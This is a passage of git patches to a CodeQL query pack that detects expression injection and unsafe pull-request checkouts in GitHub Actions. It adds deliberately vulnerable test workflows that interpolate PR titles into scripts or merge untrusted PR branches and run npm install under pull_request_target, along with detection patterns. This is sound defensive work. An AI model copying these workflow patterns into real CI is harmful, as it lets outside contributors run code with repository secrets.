this.getAMatrixVarExpr() } override AstNodeImpl getParentNode() { result.getAChildNode() = this } override string getAPrimaryQlClass() { result = "StrategyImpl" } @@ -557,10 +536,8 @@ class JobImpl extends AstNodeImpl, TJobNode { workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n } - // TODO: REMOVE override string toString() { result = "Job: " + jobId } - //override string toString() { result = n.toString() } override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } override WorkflowImpl getParentNode() { result.getAChildNode() = this } @@ -739,7 +716,6 @@ class UsesStepImpl extends StepImpl, UsesImpl { result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) } - // TODO: REMOVE override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } @@ -760,7 +736,6 @@ class ExternalJobImpl extends JobImpl, UsesImpl { ExternalJobImpl() { n.lookup("uses") = u } - //override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } override string getCallee() { if u.getValue().matches("./%") then result = u.getValue().regexpCapture(pathUsesParser(), 1) @@ -796,7 +771,6 @@ class RunImpl extends StepImpl { ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } - // TODO: REMOVE override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } @@ -807,14 +781,6 @@ class RunImpl extends StepImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class ContextExpressionImpl extends ExpressionImpl { - // TODO: REMOVE - // ContextExpressionImpl() { - // expression - // .regexpMatch([ - // stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), - // matrixCtxRegex() - // ]) - // } abstract string getFieldName(); abstract AstNodeImpl getTarget(); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 32d37efdaae..23ae225e07e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -96,6 +96,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow\\s*\\.\\s*path\\b", "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 52c2ae6a483..bda55da5c82 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -72,7 +72,6 @@ class DataFlowCall instanceof Cfg::Node { /** Gets a textual representation of this element. */ string toString() { result = super.toString() } - //Location getLocation() { result = super.getLocation() } string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } @@ -84,7 +83,6 @@ class DataFlowCall instanceof Cfg::Node { class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } - //Location getLocation() { result = super.getLocation() } string getName() { if this instanceof ReusableWorkflow then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index fd4f03e1edd..66a055634c7 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -34,14 +34,14 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph -from MyFlow::PathNode source, MyFlow::PathNode sink +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w where MyFlow::flowPath(source, sink) and - source - .getNode() - .asExpr() - .getEnclosingWorkflow() - .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) select sink.getNode(), source, sink, "Potential expression injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getExpression() diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml new file mode 100644 index 00000000000..0ee850f183d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml @@ -0,0 +1,100 @@ +name: changelog + +on: + workflow_call: + inputs: + create: + description: Add a log to the changelog + type: boolean + required: false + default: false + update: + description: Update the existing changelog + type: boolean + required: false + default: false + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + if: (inputs.create && failure()) || (inputs.update && success()) + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml new file mode 100644 index 00000000000..b0a1ea5ed68 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml @@ -0,0 +1,9 @@ +name: '📋' + +on: + pull_request: + branches: [master] + +jobs: + changelog: + uses: ./.github/workflows/changelog.yml From 1bf2431c992f2c45ba9d23b7c970fb271083ab34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 15:41:57 +0100 Subject: [PATCH 0091/1267] Improve UntrustedCheckout query Account for more events, more triggers and heuristics to detect git checkouts --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 87 ++++++++++++------- .../CWE-829/.github/workflows/gitcheckout.yml | 23 +++++ 2 files changed, 81 insertions(+), 29 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 865169b3cd9..0b3a2873d51 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -15,39 +15,68 @@ import actions -/** - * An If node that contains an `actor` check - */ -class ActorCheck extends If { - ActorCheck() { +/** An If node that contains an actor, user or label check */ +class ControlCheck extends If { + ControlCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") - } -} - -/** - * An If node that contains a `label` check - */ -class LabelCheck extends If { - LabelCheck() { + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") or this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") } } -from Workflow w, LocalJob job, UsesStep checkoutStep +bindingset[s] +predicate containsHeadRef(string s) { + s.matches("%" + + [ + "github.event.number", // The pull request number. + "github.event.pull_request.head.ref", // The ref name of head. + "github.event.pull_request.head.sha", // The commit SHA of head. + "github.event.pull_request.id", // The pull request ID. + "github.event.pull_request.number", // The pull request number. + "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. + "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. + "github.event.workflow_run.head_branch", // The branch of the head commit. + "github.event.workflow_run.head_commit.id", // The SHA of the head commit. + "github.event.workflow_run.head_sha", // The SHA of the head commit. + "env.GITHUB_HEAD_REF", + ] + "%") +} + +/** Checkout of a Pull Request HEAD ref */ +abstract class PRHeadCheckoutStep extends Step { } + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { + ActionsCheckout() { + this.getCallee() = "actions/checkout" and + containsHeadRef(this.getArgumentExpr("ref").getExpression()) + } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitCheckout extends PRHeadCheckoutStep instanceof Run { + GitCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*git\\s+fetch.*") and + ( + containsHeadRef(line) + or + exists(string varname | + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and + line.matches("%" + varname + "%") + ) + ) + ) + } +} + +from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent("pull_request_target") and - w.getAJob() = job and - job.getAStep() = checkoutStep and - checkoutStep.getCallee() = "actions/checkout" and - checkoutStep - .getArgumentExpr("ref") - .getExpression() - .matches([ - "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", - "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%" - ]) and - not exists(ActorCheck check | job.getIf() = check or checkoutStep.getIf() = check) and - not exists(LabelCheck check | job.getIf() = check or checkoutStep.getIf() = check) -select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'." + w.hasTriggerEvent(["pull_request_target", "issue_comment", "workflow_run"]) and + w.getAJob().(LocalJob).getAStep() = checkout and + not exists(ControlCheck check | + checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml new file mode 100644 index 00000000000..ab121239c6e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + # 1. Check out the content from an incoming pull request + - run: | + git fetch origin $HEAD_BRANCH + git checkout origin/master + git config user.name "release-hash-check" + git config user.email "<>" + git merge --no-commit --no-edit origin/$HEAD_BRANCH + env: + HEAD_BRANCH: ${{ github.head_ref }} + - uses: actions/setup-node@v1 + # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as + # the build scripts and referenced packages are controlled by the author of the pull request + - run: | + npm install + npm build From 839d16cde563efe235bca401d6959e97a1bdaf47 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 18:41:17 +0100 Subject: [PATCH 0092/1267] Treat If's values as expression no matter the delimiters --- ql/lib/codeql/actions/Ast.qll | 12 ++ ql/lib/codeql/actions/ast/internal/Ast.qll | 20 ++- ql/src/Security/CWE-829/UntrustedCheckout.ql | 39 ++--- ql/test/library-tests/test.expected | 7 +- ql/test/library-tests/test.ql | 10 ++ .../CriticalExpressionInjection.expected | 4 + .../CWE-094/ExpressionInjection.expected | 4 + .../CWE-829/.github/workflows/auto_ci.yml | 135 ++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 3 + .../CWE-829/UntrustedCheckout.expected | 5 +- 10 files changed, 215 insertions(+), 24 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 3123518d369..271182a05dd 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,6 +1,16 @@ private import codeql.actions.ast.internal.Ast private import codeql.Locations +module Utils { + bindingset[expr] + string normalizeExpr(string expr) { + result = + expr.regexpReplaceAll("[\\.\\'\\[\\]\"]+", ".") + .regexpReplaceAll("\\.$", "") + .regexpReplaceAll("\\.\\s", " ") + } +} + class AstNode instanceof AstNodeImpl { AstNode getAChildNode() { result = super.getAChildNode() } @@ -188,6 +198,8 @@ class Step extends AstNode instanceof StepImpl { */ class If extends AstNode instanceof IfImpl { string getCondition() { result = super.getCondition() } + + Expression getConditionExpr() { result = super.getConditionExpr() } } abstract class Uses extends AstNode instanceof UsesImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 028f2280680..14f3cd2ecd9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -45,6 +45,14 @@ private newtype TAstNode = ) ) ) + or + // if's conditions do not need to be delimted with ${{}} + exists(YamlMapping m | + m.maps(key, value) and + key.(YamlScalar).getValue() = ["if"] and + value.getValue() = raw and + exprOffset = 1 + ) } or TCompositeAction(YamlMapping n) { n instanceof YamlDocument and @@ -123,7 +131,7 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { override Location getLocation() { result = value.getLocation() } - override YamlNode getNode() { result = value } + override YamlScalar getNode() { result = value } } class ExpressionImpl extends AstNodeImpl, TExpressionNode { @@ -135,15 +143,16 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { ExpressionImpl() { this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and - expression = - rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + if rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}") + then expression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() + else expression = rawExpression.trim() } override string toString() { result = expression } override AstNodeImpl getAChildNode() { none() } - override AstNodeImpl getParentNode() { result.getNode() = value } + override ScalarValueImpl getParentNode() { result.getNode() = value } override string getAPrimaryQlClass() { result = "ExpressionNode" } @@ -638,6 +647,9 @@ class IfImpl extends AstNodeImpl, TIfNode { /** Gets the condition that must be satisfied for this job to run. */ string getCondition() { result = n.(YamlScalar).getValue() } + + /** Gets the condition that must be satisfied for this job to run. */ + ExpressionImpl getConditionExpr() { result.getParentNode().getNode() = n } } class EnvImpl extends AstNodeImpl, TEnvNode { diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 0b3a2873d51..438e3dfe7fc 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -18,29 +18,32 @@ import actions /** An If node that contains an actor, user or label check */ class ControlCheck extends If { ControlCheck() { - this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or - this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") + Utils::normalizeExpr(this.getCondition()) + .regexpMatch([ + ".*github\\.actor.*", ".*github\\.triggering_actor.*", + ".*github\\.event\\.pull_request\\.user\\.login.*", + ".*github\\.event\\.pull_request\\.labels.*", ".*github\\.event\\.label\\.name.*" + ]) } } bindingset[s] predicate containsHeadRef(string s) { - s.matches("%" + - [ - "github.event.number", // The pull request number. - "github.event.pull_request.head.ref", // The ref name of head. - "github.event.pull_request.head.sha", // The commit SHA of head. - "github.event.pull_request.id", // The pull request ID. - "github.event.pull_request.number", // The pull request number. - "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. - "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. - "github.event.workflow_run.head_branch", // The branch of the head commit. - "github.event.workflow_run.head_commit.id", // The SHA of the head commit. - "github.event.workflow_run.head_sha", // The SHA of the head commit. - "env.GITHUB_HEAD_REF", - ] + "%") + Utils::normalizeExpr(s) + .matches("%" + + [ + "github.event.number", // The pull request number. + "github.event.pull_request.head.ref", // The ref name of head. + "github.event.pull_request.head.sha", // The commit SHA of head. + "github.event.pull_request.id", // The pull request ID. + "github.event.pull_request.number", // The pull request number. + "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. + "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. + "github.event.workflow_run.head_branch", // The branch of the head commit. + "github.event.workflow_run.head_commit.id", // The SHA of the head commit. + "github.event.workflow_run.head_sha", // The SHA of the head commit. + "env.GITHUB_HEAD_REF", + ] + "%") } /** Checkout of a Pull Request HEAD ref */ diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4ef2a2e5875..df8c6ddf9cd 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -190,7 +190,7 @@ parentNodes | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | @@ -415,3 +415,8 @@ calls | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 8cf97d58ab0..268396a711e 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,4 +1,5 @@ import codeql.actions.Ast +import codeql.actions.Ast::Utils as Utils import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations @@ -59,3 +60,12 @@ query predicate summaries(string action, string version, string input, string ou query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } + +query string testNormalizeExpr(string s) { + s = + [ + "github.event.pull_request.user['login']", "github.event.pull_request.user[\"login\"]", + "github.event.pull_request['user']['login']", "foo['bar'] == baz" + ] and + result = Utils::normalizeExpr(s) +} diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index c9ac215666f..38884b3eaef 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -58,6 +59,8 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -187,6 +190,7 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index cb924c97ea1..21a9978c54f 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -58,6 +59,8 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -188,6 +191,7 @@ subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml new file mode 100644 index 00000000000..cb20cfe629b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml @@ -0,0 +1,135 @@ +name: Python CI + +on: + push: + branches: [ master ] + pull_request_target: + branches: [ master, stable ] + +concurrency: + group: ${{ format('ci-{0}', github.head_ref && format('pr-{0}', github.event.pull_request.number) || github.sha) }} + cancel-in-progress: ${{ github.event_name == 'pull_request_target' }} + +jobs: + lint: + runs-on: 